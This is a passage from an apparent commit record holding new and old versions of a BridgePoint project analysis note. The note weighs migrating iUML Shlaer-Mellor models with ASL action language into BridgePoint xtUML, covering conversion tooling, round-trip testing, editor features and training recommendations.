months\n|===\n\nSyntax highlighting is relatively simple within an Eclipse environment.\nA set of keywords can be defined and associated with the text editor.\nThrough pattern matching, the text editor highlights any of the words\nfound in the keyword configuration file.\n\nAutomatic indentation can be accomplished using regular expressions on a\nline by line basis. The standard text editor is extended to use a class\nthat supplies these rules. An Eclipse extension exists to assist with this;\nthis extension has been used in the OAL editor.\n\nName validation is the first feature to require a parser generated\nfrom a Backus-Naur form (BNF or EBNF) grammar of the language.\nName validation links the textual action language with the structural\nelements of the language such as classes, associations, events, etc.\nWhen parsing the activities, the names used in the action language\ncan be validated against the containing xtUML model. Syntax errors\ncan be highlighted right away without the need to invoke the back end\ncompiler tool chain. Name validation can be done \"real-time\" while\ntyping or as an overall model parse batch process.\n\nContext-sensitive content assistance was recently added to OAL in\nBridgePoint and was received with acclaim [<<dr-6,2.6>>]. The user experience\nis enhanced, and the productivity improvement is measurable. The feature\nrequires a parser that dynamically links to structural elements in the\nmodel and provides lists of candidates for the next lexeme in the currently\nedited action language statement.\n\nRename\/refactoring updates action language when structural model elements\nare renamed or deleted. The feature proactively helps the user update\nthe actions affected by a particular model edit. This is a complex feature\nwith subtleties that must be considered carefully. Such rename\/refactoring\nis a feature of the MASL activity editor.\n\n=== WASL2MASL\nWASL is a textual representation of a model including both structural\nand activity definitions. WASL represents class, association, state,\nand transition instances as well as action language activities.\nLikewise, MASL can represent the fullness of the Shlaer-Mellor semantic\nfor an application model. Both languages are derivatives of the same\nmethodology and roughly the same meta-model. There is a mapping of\nstructural elements, and ASL activity semantics are a subset of MASL\nactivity semantics. Therefore, WASL can potentially be converted to MASL.\n\nThe distinction of manual versus automatic conversion of activities\nis interesting, because it is likely that WASL will be converted to\nxtUML+ASL as a first step in the tooling migration process. As such,\nit will be true that WASL models will have already been converted into\nxtUML+ASL by the time a MASL conversion is needed. This leaves only\nthe activities to be converted.\n\nNote this conversion is valuable only if MASL is selected as the action\nlanguage now or at some future date. Otherwise, this conversion has limited\nvalue (in the case of using a MASL-compatible model compiler) or no value\nat all.\n\nOptions for converting WASL to MASL include manual and automatic\nconversion. Three approaches could be taken:\n\n[options=\"header\"]\n|===\n| conversion strategy | ROM effort\n| WASL to xtUML to MASL with manual conversion of ASL activities | linear to the quantity of ASL\n| WASL to xtUML to MASL with automatic conversion of ASL activities | 3 months (post initial migration)\n| full textual WASL to full textual MASL | 4 months\n|===\n\n=== WASL2xtUML\nConsidering <<wasl-flow>>, WASL2xtUML is the conversion and import flow.\nIt is the top stream starting with WASL and ending with xtUML-with-ASL\neditable with the BridgePoint tool.\n\nPrototyping has confirmed that a utility called `m2x` can be leveraged.\n`m2x` stands for MASL-to-xtUML. `m2x` was built as part of Raven [<<dr-3,2.3>>].\nThe first step in the flow is a conversion of the input to\n\"serial MASL\" (SMASL) [<<dr-5,2.5>>] using a parser. Even though WASL is not\nthe same as MASL, the parser in the flow can be replaced to do a similar\nconversion on WASL. A prototype parser (`WaslParser`) has been written that\npartially converts WASL to SMASL. This allows `m2x` to be reused (with\na few changes) to populate the xtUML meta-model with instances representing\nthe input model.\n\n[options=\"header\"]\n|===\n| conversion task | ROM effort\n| convert Relationships and Events test models as prototypes | 1 month\n| convert arbitrary WASL models with round trip integrity checking | 4 months\n|===\n\nThis work is required in the initial phase to accomplish automated model\nconversion. A command line interface to the conversion is necessary.\n\n==== Diagram Editing\nWASL contains no graphical diagram information. The semantics of the\nmodel are carried without placement, spacial or size data. The present\nunderstanding is that graphical information is effectively trapped within\nthe iUML tool. Graphical information will need to be restored to diagrams\nwith a combination of automatic graphics reconciliation and manual\narrangement.\n\nBridgePoint has the capability to perform graphics reconciliation\n(generate graphics) on semantic model data. However, the layout is\nlimited. Graphical elements are positioned such that they are not\non top of each other. Normally they are lined up side by side across\nthe top of a diagram canvas. The user is left to drag the elements\n(classes, states, packages) around and straighten the connectors\n(class associations and state transitions).\n\nTwo connector routing algorithms are supported in BridgePoint,\n`Oblique` (default) and `Rectilinear`. Oblique routing uses a direct\nrouting strategy including diagonal lines. Rectilinear routing\nemploys right angles.\n\nNo specific engineering is required in a model migration. Diagram\nediting and layout can be handled procedurally.\n\n=== xtUML2WASL\nConsidering <<wasl-flow>>, xtUML2WASL is the export flow.\nIt is the bottom stream starting with xtUML and ending with the flat\nASCII representation WASL consumable by the WACA model compiler.\n\nPrototyping has confirmed that a utility called `x2m` can be leveraged.\n`x2m` stands for xtUML-to-MASL. `x2m` was built as part of the\nRaven [<<dr-3,2.3>>] project. `x2m` converts xtUML to serialized MASL. In\nthe MASL flow, the serialized MASL is processed by a model-based model\ncompiler called `masl`. Much of this model compiler can be reused and\nits back end replaced to render WASL instead of MASL. The resulting\nexecutable would be called `wasl`. (See <<wasl-flow>>.)\n\n[options=\"header\"]\n|===\n| conversion task | ROM effort\n| convert Relationships and Events models from xtUML into WASL | 1 month\n| arbitrary xtUML-to-WASL with round trip integrity checking | 4 months\n|===\n\nThis work is required in the initial phase to accomplish automated\nmodel conversion. Access to this export functionality would be supplied\nboth to the GUI (within BridgePoint) and from the command line.\n\n=== File Formats\nWASL data is stored in a hierarchical set of directories and flat ASCII files.\nThe file formats have been documented by the user. A spreadsheet containing\nextracted model data with labeled header columns can be found here [<<dr-7,2.7>>].\n\n=== Integrity\nA mechanism for ensuring the integrity of model conversion was created for\nMASL to xtUML and xtUML to MASL. The mechanism recognizes that models\nneed to be converted in \"both directions\", from MASL to xtUML and from xtUML\nto MASL. Thus, a model can be converted and then converted back and compared\nto the original input.\n\nWASL can be converted to xtUML. And then that xtUML model can be exported\nas WASL. The output WASL of the second step can be compared to input WASL\nof the first step. Allowing for non-semantic ordering and spacing, the\nfile contents should be identical.\n\nThis process can be automated.\n\n==== WASL Round-Trip\n_Round-Trip Testing_ automates the above integrity checks on\narbitrary sets of models. Round-trip testing was used in a previous\nproject to validate the conversion process on proprietary user models\nsecured on a private internal network. The user ran the round-trip\ntesting script on subsets of to-be-converted customer models. Problems\nwere encountered. The user crafted small, non-proprietary test models\nwhich isolated the problem construct. The problem was reported to the\nBridgePoint engineering team along with the reproduction model.\nIssues were resolved until 100% of the user model repository converted\ncleanly. See <<roundtrip-image>>.\n\n[[roundtrip-image]]\nimage::roundtrip.png[Round Trip Testing]\nRound Trip Testing of User Models\n\nA round-trip testing approach can be taken with WASL. A script can\nbe created which automates the conversion\/import of WASL models into\nBridgePoint followed by the export of WASL from BridgePoint\/xtUML.\nThe output can be compared to the input. A report (scorecard) can\nbe generated. The scorecard can be driven to 100% success.\n\n* The script can be run behind a secure firewall on actual user\nmodel data. Then results can be reported without exposing user IP.\n* Small models that reproduce errors identified can be created and\nadded to a regression test suite.\n* The process is clear and measurable and drives out defects.\n\n=== Configuration Management Analysis\n\n[[clearcase-flow]]\nimage::clearcase.png[ClearCASE Revision Progression]\nClearCASE Revision Progression\n\nConfiguration management is supplied in the BridgePoint tool. However,\nconfiguration management is not a component of BridgePoint proper.\nBridgePoint is built upon an Eclipse [<<dr-9,2.9>>] framework. This allows the\nengineering of BridgePoint to focus on modeling and methodology.\nA separation of concerns is made between model editing\/simulation\/compilation\nand the underlying concerns such as desktop organization, color schemes,\nfonts, menu frameworks, file system access, target code compilation and\nconfiguration management.\n\nIn BridgePoint, configuration management is supplied through an Eclipse API\ncalled _TEAM_. The TEAM interface abstracts configuration management away\nfrom the specifics of particular CM implementations such as Git, CVS,\nSubversion, ClearCASE, Dimensions and others. Support for check-out,\ncheck-in, branch, merge and the like are supported but operate on file\nsystem resources such as files and directories.\n\nBridgePoint persists its model data as ASCII files on the file system\n(presently in an SQL syntax). A model is logically and semantically\nsubdivided into Eclipse projects and UML _packages_. This partitioning\nallows models to be version-controlled in a scalable fashion that enables\nteams of engineers to work in parallel at the domain level, class diagram\nlevel or at the level of individual classes and state machines.\n\nNote that since BridgePoint persists model data as ASCII files in an open,\naccessible and documented format, users have the option of performing\nconfiguration management idependently from the BridgePoint tool.\nIn such a situation no dependencies on Eclipse, TEAM and\/or BridgePoint\nexist. It is comforting to undertand that user data is wide open and\ncan be managed in the way best suited to existing source code management\nprocedures.\n\nThe Eclipse TEAM API is accessed naturally while editing model elements\nwithin the model hierarchy. Checking out and checking in models are\naccomplished in a manner consistent with other forms of source code.\n\n=== WACA Model Compiler Migration\nWACA represents valuable intellectual property (IP). It embodies the\nsoftware architecture. Rules of translation from Shlaer-Mellor platform\nindependent models (PIMs) are manifest as a separate concern. WACA contains\nno application-specific information; it is platform specific. Multiple\napplications are translated with this model compiler.\n\nModel-based model compilation technology is advancing. Model-based model\ncompilers are more portable and can be developed to generate code faster\nthan previous approaches. WACA follows the traditional interpreted\narchetype approach to code generation. Effort to convert it to newer\napproaches would take time and require access to the architecture source.\n\n== Conclusions and Recommendations\n\nAs stated in <<Introduction and Background>>, there are significant\nchallenges to face. However, this project has the advantage of following\nafter project Raven [<<dr-3,2.3>>] which shared a similar set of requirements\nand produced tooling that can be leveraged to a significant extent.\nThe Raven project spanned roughly two calendar years with varying degrees\nof engineering and engagement during that time. A larger quantity of\nmodel data needed to be migrated. There was no room for flaws in the\nmigration process; 100% integrity needed to be achieved. The requirements\non editing the models was similar to the present project. A model\ncompiler tool chain was to be preserved; this was accomplished.\n\nThe fundamental conclusion is that a migration from iUML with ASL activities\nonto BridgePoint with ASL activities is feasible. The cost in terms of\nengineering effort will be significantly lower based on work already done\nin Raven and during this Assessment.\n\nThe recommendation of One Fact is to proceed with a migration and retain\nASL as the action language during the migration.\n\nMASL should be considered as an alternate action language at some point\nafter a migration. But at the present time, reasons to switch are not\ncompelling.\n\nThe following sections will highlight conclusions and recommendations\nitem by item. These sections are not intended to replace Software\nRequirements Specifications, project plans, and Statemens of Work.\nThese sections simply summarize the results of the Assessment and\ncommunicate a high level overview of recommended Next Steps.\nSizings, resource allocation and time schedules will be more accurately\nprovided in project documentation should such projects be commissioned.\n\n=== Action Language\nThis analysis concludes that a migration staying with ASL is a best first\nstep even if a migration to MASL (next choice) is desired in the future.\nWe recommend that ASL be used as the action language for the immediate\nfuture. We recommend that MASL be considered after a successful migration\nof existing models.\n\n. Stay with ASL until the tool migration is complete.\n. Consider MASL as a long term strategy.\n\n=== ASL Editor\n. Add keyword highlighting in the first version of the ASL activity editor.\nThis will avoid a sense of \"stepping backwards\" from the iUML activity editor.\n. Add auto-indentation; it is a relatively low effort for a nice feature.\n. Plan for real-time name validation and context-sensitive assistance.\n. At a later time, consider the cost\/benefit of rename\/refactor.\n\nMost of this work is best done by the BridgePoint engineering team.\nHowever, it may be a consideration to explore porting the iUML simulator\nto parse ASL activities to vet out syntax errors before compilation.\n\n=== WASL2MASL\n- This will be valuable if a migration to MASL is decided upon in the\nfuture. It is of no value otherwise.\n\n=== WASL2xtUML\n- This is core. Perform this task in the first phase of development.\n- Provide a command line interface to the conversion to support automation.\n- Retain the BridgePoint engineering team for this work.\n\n=== xtUML2WASL\n- This is core. Perform this task in the first phase of development.\n- Obtain capability from within BridgePoint and from the command line.\n- Retain the BridgePoint engineering team for this work.\n\n=== File Formats\n- Using the documented file formats, build a parser to consume these files\nas part of WASL2xtUML conversion.\n\n=== Conversion Integrity and WASL Round Trip\n- In order to satisfy the need for high integrity in the conversion of\nWASL to xtUML and xtUML to WASL, employ the round-trip strategy to achieve\na high degree of confidence in the conversion. This also reduces risk of\nwasted graphical editing effort on models that need to be reconverted.\n- The tooling for this work is best done by the BridgePoint engineering\nteam. Running the scripts locally is best done by a local engineer with\naccess to the model data.\n\n=== Diagram Editing\n1. Be certain model conversion is sound before performing manual diagram\nrearrangement.\n2. Consider rearranging diagram layouts as needed. There may be little\nreason to lay out a diagram that is not being viewed on a regular basis.\n3. Employ `Oblique` and `Rectilinear` routing strategies during layout.\n4. Employ your own engineering talent for this work due to security\nclearance requirements.\n\n=== xtUML and BridgePoint Training\nIt is important to ramp up tooling knowledge within the organization.\nThis means that knowledge transfer begins with a few and increases to\nmore, and that expertise exists heavily in a few and lightly in many.\nThere is a continuum of tooling and methodology expertise that is at\nits peak (capability and cost) outside the company with consultants\nand then high with a few people inside the shop and then adequate with\neveryone else using the tool.\n\nTo achieve this balance a plan must be established. Following are\nrecommendations to be incorporated into the training plan.\n\n. Designate one or two internal champions now.\n. Begin training up the local champion during the Assessment and through\nthe first phase of the model\/tool migration projects.\n. Use a combination of online resources and on-site training.\n. Have a few engineers work through the online training materials.\n. Designate a primary contact to the BridgePoint team and to the xtUML\nCommunity including access to BridgePoint issue trackers and configuration\nmanagement repositories.\n. Schedule the _Basic xtUML Modeling_ course for the champion and a few\nearly adopters.\n. Plan to push training deeper into the organization as modeling projects\nroll out.\n\n==== Example Model\nDuring the Raven project, it became clear that the BridgePoint development\nteam needed to model in the MASL dialect. It was important that the engineers\nbuilding the tools were using the tools in that specific user mode. Thus\nthe engineers could experience (both good and bad) what MASL modelers were\nexperiencing. In the Raven project, this realization came relatively late.\nThe example model serves as another test model to run through the process,\nbut more importantly, it serves as editing experience.\n\nAn ASL dialect project may learn from this experience and commission an\nexample application model early on. The GPS Watch is a prime candidate\nfor such a model. It has already been modeled in OAL and MASL action\nlanguages.\n\n. Commission the creation of a reasonable application test model exhibiting\nthe ASL dialect.\n. Build such a model in the public domain as open source and stored alongside\nother xtUML applications so that users and potential users may find it.\n. Consider building this model as a shared effort between both client and\nsupplier so that a maximum of knowledge exchange occurs.\n. Choose the GPS Watch application for this effort. It will provide the\nlargest return on the smallest investment.\n\n\n=== Configuration Management\n. Adopt a configuration management strategy that is compatible with the\nversion control of other source artifacts in your organization (probably\nClearCASE).\n. Spend time practicing configuration management of BridgePoint xtUML models.\n - create a branch\n - check-out\n - check-in\n - merge branches\n - resolve a conflict\n\n=== Model Compiler Migration\nAt this point, WACA should be preserved and reused. Migration away from\nWACA should be considered only after a successful migration of iUML\napplication models into new tooling.\n\n. Protect and preserve the IP of the WACA model compiler.\n. Consider options for improving the throughput and maintainability of WACA\nafter initial model migration has settled.\n. Consider placing WACA into the public domain at some point in the future.\nThis may result in community engagement and additional resources maintaining\nthe architecture.\n\n---\n\nThis work is licensed under the Creative Commons CC0 License\n\n---\n","old_contents":"= Analyze Options for ASL BridgePoint\n\nxtUML Project Analysis Note\n\n:sectnums:\n\n== Abstract\n\nThis note documents research into a migration of Shlaer-Mellor application\nmodels from iUML into BridgePoint. Options are explored, and observations\nare recorded.\n\n== Document References\n\n. [[dr-1]] https:\/\/support.onefact.net\/issues\/10414[10414 Analyze Options for Migration]\n. [[dr-2]] https:\/\/docs.google.com\/document\/d\/1LQYNA7Zln1h8h8wbRNeZb0GukVMXLV89nSwg8SICeG4\/edit[SRS - Software Requirements Specification for client Assessment]\n. [[dr-3]] https:\/\/support.onefact.net\/issues\/8269[8269 - Raven Project Phase 1]\n. [[dr-4]] http:\/\/www.ooatool.com\/docs\/ASL03.pdf[UML ASL Reference Guide]\n. [[dr-5]] link:..\/8073_masl_parser\/8277_serial_masl_spec.md[Serial MASL (SMASL) Specification]\n. [[dr-6]] https:\/\/www.youtube.com\/watch?v=lmZJ44ceDD8[OAL Context-Sensitive Content Assist]\n. [[dr-7]] link:ExtractionWithHeaders.xlsx[File Formats: Extraction with Headers]\n. [[dr-8]] TBD - delivered prototype(s)\n. [[dr-9]] http:\/\/www.eclipse.org\/[Eclipse - IDE Framework from the Eclipse Foundation]\n\n== Introduction and Background\n\nAs of 2017, models built with iUML and having _MASL_ (_Model and Action\nSpecification Language_) activities (action language bodies) can be migrated\ninto BridgePoint using a tool chain built for project Raven [<<dr-3,2.3>>].\nIn Raven, tools were constructed to convert iUML models expressed as MASL\ninto xtUML. The xtUML could then be imported into BridgePoint. Tools were\nbuilt to export xtUML models (back) into the MASL format. A similar process\nis desired for models built with iUML and having _ASL_ (_Action Specification\nLanguage_), activities. In the new flow, tools would be used to convert iUML\nmodels in WASL format into xtUML. Tools would be available to export xtUML\nmodels from BridgePoint (back) into the WASL format.\n\nThe native iUML action language, ASL, has a syntax in the public domain.\nA language reference for it can be found in [<<dr-4,2.4>>]. ASL is\nfundamentally similar to _OAL_ (_Object Action Language_), the default\naction language of BridgePoint, however it is a bit richer and supports\ninstance identity more tightly on the create statement. There are other\nadvantages and disadvantages as described in <<Action Language Comparison>>.\n\niUML models can be represented in a form consumable by a software\narchitecture (model compiler) called _WACA_ (_Waterloo Auto Code\nGenerator and Architecture_). This form shall be denoted _WASL_\n(WACA-with-ASL).\n\nSeveral paths exist to move forward from iUML\/ASL. This assessment is\nintended to traverse these paths and explore different options which enable\nShlaer-Mellor Model-Driven Development to continue into future engineering\nprojects. Options include changing the model editing environment and\nswitching to a different action language. However, it is desired that\nthe back end model compiler tool chain be preserved to a large extent.\n\nThe highlights of this assessment report include:\n\n- choice of action language\n- challenge of transforming WASL to xtUML (for conversion\/import)\n- challenge of generating WASL from xtUML (export to model compiler)\n- loss and regeneration\/re-layout of model graphical diagram information\n- testing and validation of the integrity of the conversions\n\nThe following figure <<wasl-flow>> will be referenced throughout the report.\nTwo flows are outlined, import (upper flow) and export (lower flow). The\ngreen triangular glyph represents xtUML. 'SMASL' is a serialized form\nof Shlaer-Mellor meta-model instances. 'm2x' is a converter of SMASL\nto xtUML. 'x2m' is a converter of xtUML to SMASL. 'wasl' is a converter\nof SMASL to WASL.\n\n[[wasl-flow]]\nimage::waslflow.png[WASL-to-xtUML and xtUML-to-WASL Flows]\nWASL-to-xtUML and xtUML-to-WASL Flows\n\nIn the following sections, the report (re)states the requirements of the\nAssessment and then provides substantial analysis. After the analysis\nis a section drawing conclusions and posing recommendations.\n\n== Requirements\n\nRequirements for an assessment of migration options are defined in a\nSoftware Requirements Specification (SRS) document [<<dr-2,2.2>>].\nThe requirements are repeated here with minor refinement.\n\n=== (A2.1) Action Language SWOT\nAnalyze the relative strengths, weaknesses, opportunities and threats of\nASL versus MASL versus OAL moving forward.\n\n=== (A2.2) ASL Editor\nExplore and size an ASL action language syntax highlighting editor.\n\n=== (A2.3) WASL2MASL\nAnalyze the costs and benefits of building a tool to convert WASL to MASL.\n\n=== (A2.4) WASL2xtUML\nUnderstand the work required to convert models from iUML-ASL (WASL) into\nxtUML to be edited within BridgePoint (model conversion and import).\n\n==== (A2.4.1) Diagram Editing\nEnumerate diagram editing issues anticipated as part of model conversion\nand ongoing editing of Kennedy-Carter idiom models in BridgePoint.\nInclude graphics issues and known differences between dialects of xtUML.\n\n=== (A2.5) xtUML2WASL\nDetermine a strategy for exporting xtUML into the existing model compiler\ntool chain (model export). Determine packaging for the extraction tool\nas a BridgePoint plugin, standalone tool or both.\n\n=== (A2.6) File Formats\nIsolate the interface to the model compilation tool chain and document\nfile formats noting that example files are supplied by the client.\n\n=== (A2.7) Integrity\nDefine steps to ensure and validate the integrity of models through\nthe conversion process.\n\n==== (A2.7.1) Round Trip\nExplore the use of \"round trip testing\" to automate the import and export\nand comparison of results.\n\n=== Decision Data\nFor each of the above requirements, consider the following:\n\n(A3) Sizings::\nEstablish relative sizings for various components and design choices.\n\n(A4) Open Sourcing:: [Removed from scope.]\n\n(A5) Talent Pool::\nRecommend the use of internal versus external talent and the community.\n\n(A6) Prototypes::\nDevelop working prototypes and\/or mock ups of workflows with screenshots\nleveraging supplied example files.\n\n(A7) Training::\nRecommend training in modeling and tooling or ad hoc consultation.\n\n(A8) Configuration Management::\niUML provides change configuration inside the tool (versions of domains\nand projects defined as a set of domains at a particular version).\nAnalysis shall propose a path to migrate a particular version of the\ncurrent application models and describe how configuration would be managed\nafter migration.\n\n(A9) Model Compiler Migration::\nFollowing UML tool migration, model compiler migration would be the\nlogical next step. Perform analysis and define a roadmap for this.\n\n== Analysis\n\nIn the following analysis the challenges of a tool migration from iUML\nto BridgePoint are explored. Each requirement listed above is independently\nanalyzed. Explanations provide insight into feasibility, engineering\ndifficulty and impact on the modelers using the tools.\n\nRough order of magnitude (ROM) estimates of effort are provided for many\nof the options. Note that these estimates are quite rough and based on\ninformation available at the time. Refinement of these estimates can be\nobtained through the design process as details into implementation are\ngathered. Please use these ROM effort estimates as just that, estimates.\nThe estimates are presented in units of (hu)man-weeks and man-months.\nCalendar time is not considered.\n\n=== Action Language Comparison\nAction language support is at the center of the challenges facing a tooling\nmigration. There are at least four action language possibilities in this\nmigration: ASL, OAL, MASL and Alf. Others may exist, but the ones explored\nand reported here can be considered true candidates.\n\nIt is important to note that some textual action languages are able\nto represent the structure of a model in addition to representing the\nprocessing of action bodies. For example, MASL has textual syntax to\nexpress the structure of classes and define associations between\nthem. MASL provides textual syntax to represent the entirety of\nthe semantics of Shlaer-Mellor models. Graphics are an additional view\nof the structural model information. Alf is another language that supplies\nsyntax for activities and (some) structural model elements. ASL and OAL\nare limited to expressing action processing. WASL extends ASL to include\na textual representation of structural Shlaer-Mellor.\n\n[options=\"header\"]\n|===\n| dialect | strengths | weaknesses | opportunities | threats\n| ASL | no change to existing flow | lack of BP interpreter | grow community | lack of parser\n| | direct pass-thru to WACA | not parsed (initially) | enhance BP |\n| | smallest change to tooling | no `else if` | |\n| | familiar to existing team | | |\n| | lowest initial cost | | |\n| | first step in any case | | |\n| | | | |\n| OAL | BridgePoint native default | conversion required | enhance syntax | behavior differences\n| | interpreted in Verifier | learning curve | go mainstream |\n| | large body of examples | less rich syntax | |\n| | alternate model compilers | | |\n| | | | |\n| MASL | richest syntax | conversion required | expressiveness | few users\n| | strongest typing | learning curve | broaden usage |\n| | local (UK) user community | | |\n| | proximity to Ada target | | |\n| | | | |\n| Alf | standardized by OMG | conversion required | standardization | distraction\n| | | gaps in the semantics | enhance BP |\n| | | lack of BP interpreter | |\n| | | overly complex syntax | |\n| | | learning curve | |\n|===\n\n=== ASL Editor\nAn ASL text editor could be produced that makes the experience of editing\nASL activities pleasant and productive (in that order!).\nThere are multiple levels of sophistication to preparing such an editor.\nListed here are features of a syntax highlighting editor ordered from\nrelatively easy to more challenging to implement.\n\nNo prototypes were produced of an ASL text editor.\n\n[options=\"header\"]\n|===\n| feature | description | parser | ROM effort\n| keyword highlighting | embolden and\/or colorize language key words | | 1 week\n| automatic indentation | Indent after `if`, `else`, `loop`, etc. | | 2 weeks\n| name validation | Rationalize identifiers with model elements. | required | 1 month\n| context-sensitive content assistance | auto-completion and selection lists | required | 2 months\n| rename\/refactoring | Update activities when model element names change. | required | 4 months\n|===\n\nSyntax highlighting is relatively simple within an Eclipse environment.\nA set of keywords can be defined and associated with the text editor.\nThrough pattern matching, the text editor highlights any of the words\nfound in the keyword configuration file.\n\nAutomatic indentation can be accomplished using regular expressions on a\nline by line basis. The standard text editor is extended to use a class\nthat supplies these rules. An Eclipse extension exists to assist with this;\nthis extension has been used in the OAL editor.\n\nName validation is the first feature to require a parser generated\nfrom a Backus-Naur form (BNF or EBNF) grammar of the language.\nName validation links the textual action language with the structural\nelements of the language such as classes, associations, events, etc.\nWhen parsing the activities, the names used in the action language\ncan be validated against the containing xtUML model. Syntax errors\ncan be highlighted right away without the need to invoke the back end\ncompiler tool chain. Name validation can be done \"real-time\" while\ntyping or as an overall model parse batch process.\n\nContext-sensitive content assistance was recently added to OAL in\nBridgePoint and was received with acclaim [<<dr-6,2.6>>]. The user experience\nis enhanced, and the productivity improvement is measurable. The feature\nrequires a parser that dynamically links to structural elements in the\nmodel and provides lists of candidates for the next lexeme in the currently\nedited action language statement.\n\nRename\/refactoring updates action language when structural model elements\nare renamed or deleted. The feature proactively helps the user update\nthe actions affected by a particular model edit. This is a complex feature\nwith subtleties that must be considered carefully. Such rename\/refactoring\nis a feature of the MASL activity editor.\n\n=== WASL2MASL\nWASL is a textual representation of a model including both structural\nand activity definitions. WASL represents class, association, state,\nand transition instances as well as action language activities.\nLikewise, MASL can represent the fullness of the Shlaer-Mellor semantic\nfor an application model. Both languages are derivatives of the same\nmethodology and roughly the same meta-model. There is a mapping of\nstructural elements, and ASL activity semantics are a subset of MASL\nactivity semantics. Therefore, WASL can potentially be converted to MASL.\n\nThe distinction of manual versus automatic conversion of activities\nis interesting, because it is likely that WASL will be converted to\nxtUML+ASL as a first step in the tooling migration process. As such,\nit will be true that WASL models will have already been converted into\nxtUML+ASL by the time a MASL conversion is needed. This leaves only\nthe activities to be converted.\n\nNote this conversion is valuable only if MASL is selected as the action\nlanguage now or at some future date. Otherwise, this conversion has limited\nvalue (in the case of using a MASL-compatible model compiler) or no value\nat all.\n\nOptions for converting WASL to MASL include manual and automatic\nconversion. Three approaches could be taken:\n\n[options=\"header\"]\n|===\n| conversion strategy | ROM effort\n| WASL to xtUML to MASL with manual conversion of ASL activities | linear to the quantity of ASL\n| WASL to xtUML to MASL with automatic conversion of ASL activities | 3 months (post initial migration)\n| full textual WASL to full textual MASL | 4 months\n|===\n\n=== WASL2xtUML\nConsidering <<wasl-flow>>, WASL2xtUML is the conversion and import flow.\nIt is the top stream starting with WASL and ending with xtUML-with-ASL\neditable with the BridgePoint tool.\n\nPrototyping has confirmed that a utility called `m2x` can be leveraged.\n`m2x` stands for MASL-to-xtUML. `m2x` was built as part of Raven [<<dr-3,2.3>>].\nThe first step in the flow is a conversion of the input to\n\"serial MASL\" (SMASL) [<<dr-5,2.5>>] using a parser. Even though WASL is not\nthe same as MASL, the parser in the flow can be replaced to do a similar\nconversion on WASL. A prototype parser (`WaslParser`) has been written that\npartially converts WASL to SMASL. This allows `m2x` to be reused (with\na few changes) to populate the xtUML meta-model with instances representing\nthe input model.\n\n[options=\"header\"]\n|===\n| conversion task | ROM effort\n| convert Relationships and Events test models as prototypes | 1 month\n| convert arbitrary WASL models with round trip integrity checking | 4 months\n|===\n\nThis work is required in the initial phase to accomplish automated model\nconversion. A command line interface to the conversion is necessary.\n\n==== Diagram Editing\nWASL contains no graphical diagram information. The semantics of the\nmodel are carried without placement, spacial or size data. The present\nunderstanding is that graphical information is effectively trapped within\nthe iUML tool. Graphical information will need to be restored to diagrams\nwith a combination of automatic graphics reconciliation and manual\narrangement.\n\nBridgePoint has the capability to perform graphics reconciliation\n(generate graphics) on semantic model data. However, the layout is\nlimited. Graphical elements are positioned such that they are not\non top of each other. Normally they are lined up side by side across\nthe top of a diagram canvas. The user is left to drag the elements\n(classes, states, packages) around and straighten the connectors\n(class associations and state transitions).\n\nTwo connector routing algorithms are supported in BridgePoint,\n`Oblique` (default) and `Rectilinear`. Oblique routing uses a direct\nrouting strategy including diagonal lines. Rectilinear routing\nemploys right angles.\n\nNo specific engineering is required in a model migration. Diagram\nediting and layout can be handled procedurally.\n\n=== xtUML2WASL\nConsidering <<wasl-flow>>, xtUML2WASL is the export flow.\nIt is the bottom stream starting with xtUML and ending with the flat\nASCII representation WASL consumable by the WACA model compiler.\n\nPrototyping has confirmed that a utility called `x2m` can be leveraged.\n`x2m` stands for xtUML-to-MASL. `x2m` was built as part of the\nRaven [<<dr-3,2.3>>] project. `x2m` converts xtUML to serialized MASL. In\nthe MASL flow, the serialized MASL is processed by a model-based model\ncompiler called `masl`. Much of this model compiler can be reused and\nits back end replaced to render WASL instead of MASL. The resulting\nexecutable would be called `wasl`. (See <<wasl-flow>>.)\n\n[options=\"header\"]\n|===\n| conversion task | ROM effort\n| convert Relationships and Events models from xtUML into WASL | 1 month\n| arbitrary xtUML-to-WASL with round trip integrity checking | 4 months\n|===\n\nThis work is required in the initial phase to accomplish automated\nmodel conversion. Access to this export functionality would be supplied\nboth to the GUI (within BridgePoint) and from the command line.\n\n=== File Formats\nWASL data is stored in a hierarchical set of directories and flat ASCII files.\nThe file formats have been documented by the user. A spreadsheet containing\nextracted model data with labeled header columns can be found here [<<dr-7,2.7>>].\n\n=== Integrity\nA mechanism for ensuring the integrity of model conversion was created for\nMASL to xtUML and xtUML to MASL. The mechanism recognizes that models\nneed to be converted in \"both directions\", from MASL to xtUML and from xtUML\nto MASL. Thus, a model can be converted and then converted back and compared\nto the original input.\n\nWASL can be converted to xtUML. And then that xtUML model can be exported\nas WASL. The output WASL of the second step can be compared to input WASL\nof the first step. Allowing for non-semantic ordering and spacing, the\nfile contents should be identical.\n\nThis process can be automated.\n\n==== WASL Round-Trip\n_Round-Trip Testing_ automates the above integrity checks on\narbitrary sets of models. Round-trip testing was used in a previous\nproject to validate the conversion process on proprietary user models\nsecured on a private internal network. The user ran the round-trip\ntesting script on subsets of to-be-converted customer models. Problems\nwere encountered. The user crafted small, non-proprietary test models\nwhich isolated the problem construct. The problem was reported to the\nBridgePoint engineering team along with the reproduction model.\nIssues were resolved until 100% of the user model repository converted\ncleanly. See <<roundtrip-image>>.\n\n[[roundtrip-image]]\nimage::roundtrip.png[Round Trip Testing]\nRound Trip Testing of User Models\n\nA round-trip testing approach can be taken with WASL. A script can\nbe created which automates the conversion\/import of WASL models into\nBridgePoint followed by the export of WASL from BridgePoint\/xtUML.\nThe output can be compared to the input. A report (scorecard) can\nbe generated. The scorecard can be driven to 100% success.\n\n* The script can be run behind a secure firewall on actual user\nmodel data. Then results can be reported without exposing user IP.\n* Small models that reproduce errors identified can be created and\nadded to a regression test suite.\n* The process is clear and measurable and drives out defects.\n\n=== Configuration Management Analysis\n\n[[clearcase-flow]]\nimage::clearcase.png[ClearCASE Revision Progression]\nClearCASE Revision Progression\n\nConfiguration management is supplied in the BridgePoint tool. However,\nconfiguration management is not a component of BridgePoint proper.\nBridgePoint is built upon an Eclipse [<<dr-9,2.9>>] framework. This allows the\nengineering of BridgePoint to focus on modeling and methodology.\nA separation of concerns is made between model editing\/simulation\/compilation\nand the underlying concerns such as desktop organization, color schemes,\nfonts, menu frameworks, file system access, target code compilation and\nconfiguration management.\n\nIn BridgePoint, configuration management is supplied through an Eclipse API\ncalled _TEAM_. The TEAM interface abstracts configuration management away\nfrom the specifics of particular CM implementations such as Git, CVS,\nSubversion, ClearCASE, Dimensions and others. Support for check-out,\ncheck-in, branch, merge and the like are supported but operate on file\nsystem 